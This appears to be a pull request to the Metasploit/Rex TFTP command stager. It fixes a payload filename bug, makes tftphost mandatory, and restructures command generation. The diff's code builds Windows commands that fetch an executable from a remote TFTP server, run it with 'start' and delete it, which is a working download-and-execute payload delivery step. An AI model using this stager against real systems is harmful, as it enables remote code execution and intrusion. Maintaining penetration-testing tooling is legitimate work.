### PR TITLE
CmdStagerTFTP: Set payload filename; raise if tftphost is not set

### DIFF
--- a/lib/rex/exploitation/cmdstager/tftp.rb
+++ b/lib/rex/exploitation/cmdstager/tftp.rb
@@ -13,7 +13,7 @@ module Exploitation
 # be written to disk and executed.
 #
 # This particular version uses tftp.exe to download a binary from the specified
-# server.  The original file is preserve, not encoded at all, and so this version
+# server. The original file is preserved, not encoded at all, and so this version
 # is significantly simpler than other methods.
 #
 # Requires: tftp.exe, outbound udp connectivity to a tftp server
@@ -24,14 +24,24 @@ module Exploitation
 
 class CmdStagerTFTP < CmdStagerBase
 
-  def initialize(exe)
-    super
-    @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
+  def generate(opts = {})
+    if opts[:tftphost].nil?
+      raise "#{self.class.name}##{__callee__} missing opts[:tftphost]"
+    end
+
+    opts[:linemax] ||= @linemax
+    opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
+    opts[:temp] ||= '%TEMP%'
+
+    @payload_exe = opts[:file]
+    @payload_path = opts[:temp] == '.' ? opts[:file] : "#{opts[:temp]}\\#{opts[:file]}"
+
+    generate_cmds(opts)
   end
 
   def setup(mod)
     self.tftp = Rex::Proto::TFTP::Server.new
-    self.tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
+    self.tftp.register_file(@payload_exe, exe)
     self.tftp.start
     mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
   end
@@ -40,28 +50,30 @@ class CmdStagerTFTP < CmdStagerBase
     self.tftp.stop
   end
 
-  #
-  # We override compress commands just to stick in a few extra commands
-  # last second..
-  #
-  def compress_commands(cmds, opts)
-    # Initiate the download
-    cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
-
-    # Make it all happen
-    cmds << "start #{@tempdir + @payload_exe}"
-
-    # Clean up after unless requested not to..
-    if (not opts[:nodelete])
-      # XXX: We won't be able to delete the payload while it is running..
+  def generate_cmds_payload(opts)
+    cmds = []
+    # We can skip the destination argument if we're writing to the working directory,
+    # as tftp defaults to writing the file to the current directory with the same filename.
+    if opts[:file] == @payload_path
+      cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]}"
+    else
+      cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]} \"#{@payload_path}\""
     end
-
-    super
+    cmds
   end
 
-  # NOTE: We don't use a concatenation operator here since we only have a couple commands.
-  # There really isn't any need to combine them. Also, the ms01_026 exploit depends on
-  # the start command being issued separately so that it can ignore it :)
+  def generate_cmds_decoder(opts)
+    cmds = []
+    cmds << "start \"#{@payload_path}\""
+    # NOTE: We can't delete the payload while it is running.
+    cmds << "del \"#{@payload_path}\"" unless opts[:nodelete]
+    cmds
+  end
+
+  def cmd_concat_operator
+    ' & '
+  end
+
   attr_reader :exe
   attr_reader :payload_exe
   attr_accessor :tftp

--- a/spec/lib/rex/exploitation/cmdstager/tftp_spec.rb
+++ b/spec/lib/rex/exploitation/cmdstager/tftp_spec.rb
@@ -12,14 +12,14 @@ RSpec.describe Rex::Exploitation::CmdStagerTFTP do
   end
 
   describe '#cmd_concat_operator' do
-    it "returns nil" do
-      expect(cmd_stager.cmd_concat_operator).to be_nil
+    it "returns &" do
+      expect(cmd_stager.cmd_concat_operator).to eq(' & ')
     end
   end
 
   describe '#generate' do
     it "returns an array of commands" do
-      result = cmd_stager.generate
+      result = cmd_stager.generate(tftphost: '0.0.0.0')
 
       expect(result).to be_kind_of(Array)
       expect(result).to_not be_empty


### PR DESCRIPTION
Fixes a bug where a new payload file name was randomly generated, ignoring `@payload_exe`. This caused the payload file name to not match the file name registered with the TFTP server using `tftp.register_file`, dooming the stager to failure. I suspect this has been broken for many years.

Allows callers of the stager to set the filename using `opts[:name]` rather than generate a random file name. This is optional and consitant with many of the other stagers.

Creates a `@payload_path` variable which specifies the full file system path to the payload executable. The full file path is then used in later commands, such as cleanup. This is in line with other stages.

Rather than clobber `compress_commands`, the stager now uses `generate_cmds_payload` and `generate_cmds_decoder` methods. This is more explicit and in line with other stagers. This also allows command "compression" (splitting) with concatenation. This was never a concern in the original implementation, as the use case was an exploit scenario where the payload could not be executed with `start`, thus concatenation was not used so as to more easily allow stripping the `start` command out of the generated stager commands.

Removes `transid`. I don't know what this argument was meant to do (#31). It is used zero times in Framework. The positional arguments for `tftp` are `source [destination]`. The existing implementation for `transid`, if set, would take the place of `source` and move the existing source to `destination`. This doesn't make much sense.

`transid` is not used anywhere and the variable name is not intuitive. It has been removed. The stager now supports optionally writing to a destination directory which is more aligned with expected behaviour.

The stager now raises if `tftphost` is not set (#31). This is kind of important, as `tftphost` was never set in any of the modules in Framework. Thus every module which attempted to use this stager would use an empty string as the host name in the `tftp` command, dooming the stager to failure. I suspect this has been broken for many years. Now the user will at least get an error message, rather than have the module fail silently for no easily discernible reason.

I did try to force the stager to default to the socket source address (`Rex::Socket.source_address`) if not set, but that would require importing the `rex/socket` dependency into the repo. Instead, I'll fix the modules in Framework which use this stager to ensure the host is set.
